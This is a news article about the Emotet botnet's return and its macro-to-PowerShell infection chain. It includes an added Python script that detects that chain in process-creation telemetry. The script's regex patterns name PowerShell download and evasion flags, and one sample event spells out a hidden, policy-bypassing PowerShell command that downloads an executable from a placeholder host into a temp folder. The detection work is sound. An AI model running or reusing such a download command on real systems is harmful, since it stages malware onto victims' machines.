Emotet, one of the world's most dangerous botnets, has surged back to life after a five-month hiatus and once more begun sending spam aimed at delivering a backdoor that installs ransomware, banking trojans, and other kinds of malware.
According to Malwarebytes Labs, the first signs of a malspam campaign were spotted on July 13; several days later, on July 17, the Emotet botnets began actively spreading spam messages using the same techniques as in previous malicious campaigns.
Malicious emails contain either a URL or an attachment that links to malicious Word files. One familiar technique is for the document to be sent as a reply within an existing email thread. The malicious document contains a heavily obfuscated macro which, when enabled, launches PowerShell to retrieve the Emotet binary from one of several compromised remote websites. Once the payload is executed, it sends a confirmation back to one of Emotet's command-and-control servers.
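The infection chain just described (Word document with a macro that launches PowerShell to fetch a binary) leaves a distinctive trace in process-creation telemetry: an Office application as the parent of a script host, with a command line carrying download and hiding flags. The following is an added detection example written for this article; it is not code from the original page, from Malwarebytes, or from Proofpoint. The events are constructed, Sysmon-style process-creation records (ParentImage / Image / CommandLine fields), the host paths are placeholders, and `example.invalid` is a reserved, non-routable name; real telemetry would come from Sysmon Event ID 1 or an EDR.

```python
"""Heuristic triage of process-creation events for the Office -> PowerShell
download chain. Added example, not the article's or any vendor's code.
"""
import re
from typing import Dict, List

# Office hosts inside which a malicious macro would execute.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Script/command hosts a macro typically uses to stage a download.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Command-line traits consistent with "retrieve a binary from a remote site"
# and with keeping that activity out of the user's sight.
SUSPICIOUS_ARGS = [
    ("download_api", re.compile(
        r"(?i)\b(DownloadFile|DownloadString|WebClient|Invoke-WebRequest|"
        r"Start-BitsTransfer)\b")),
    ("encoded_command", re.compile(r"(?i)\s-(e|ec|enc|encodedcommand)\s")),
    ("hidden_window", re.compile(r"(?i)\s-w(indowstyle)?\s+hidden\b")),
    ("policy_bypass", re.compile(r"(?i)\s-(ep|exec|executionpolicy)\s+bypass\b")),
]


def basename(path: str) -> str:
    """Return the lower-cased file name component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: Dict) -> Dict:
    """Classify one process-creation record.

    high   : Office parent spawned a script host AND the command line carries
             download/evasion traits (the chain the article describes)
    medium : Office parent spawned a script host, no suspicious arguments
    low    : suspicious arguments only, from a non-Office parent
    none   : nothing matched
    """
    parent = basename(ev.get("ParentImage", ""))
    child = basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    reasons: List[str] = []

    office_chain = parent in OFFICE_PARENTS and child in SCRIPT_HOSTS
    if office_chain:
        reasons.append(f"office_spawned_script_host:{parent}->{child}")
    for name, pattern in SUSPICIOUS_ARGS:
        if pattern.search(cmd):
            reasons.append(name)
    arg_hits = len(reasons) - (1 if office_chain else 0)

    if office_chain and arg_hits:
        severity = "high"
    elif office_chain:
        severity = "medium"
    elif arg_hits:
        severity = "low"
    else:
        severity = "none"
    return {"severity": severity, "reasons": reasons,
            "parent": parent, "child": child}


def triage(events: List[Dict]) -> List[Dict]:
    """Score a batch of events; returns one result dict per input event."""
    return [score_event(ev) for ev in events]


# Constructed sample telemetry (not real captures); paths are placeholders.
SAMPLE_EVENTS = [
    {   # benign: user opens PowerShell from Explorer to list a folder
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe Get-ChildItem C:\Users\alice\Documents",
    },
    {   # the chain in the article: Word -> hidden PowerShell -> download
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -w hidden -ep bypass "
                       "(New-Object Net.WebClient).DownloadFile("
                       "'http://example.invalid/doc',"
                       "'C:\\Users\\alice\\AppData\\Local\\Temp\\a.exe')",
    },
    {   # Word spawning cmd.exe with an innocuous command line
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c echo done",
    },
    {   # admin maintenance script: bypass flag, but a service-host parent
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass "
                       r"-File C:\Scripts\inventory.ps1",
    },
]

if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        print(f"{result['severity']:6} {result['parent']} -> "
              f"{result['child']} {result['reasons']}")
```

The parent-child relation is the strong signal here; the command-line flags on their own are common in legitimate administration (the fourth sample), which is why they only raise a "low" on their own and escalate to "high" when an Office process is the parent.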
According to Sherrod DeGrippo, senior director of threat research and detection at the security firm Proofpoint, the botnet has been observed sending 250,000 messages over the course of the day, mostly to victims in the United States and the United Kingdom. Other researchers tracking Emotet's activity report that targets were also located in the Middle East, South America, and Africa.
The Emotet botnet is known for launching massive campaigns that usually last a short time and then going dormant for weeks or months at a time. True to its MO, the latest Emotet campaign stopped completely on July 18. Indicators of compromise from the recent Emotet spamming spree can be found here, here, and here.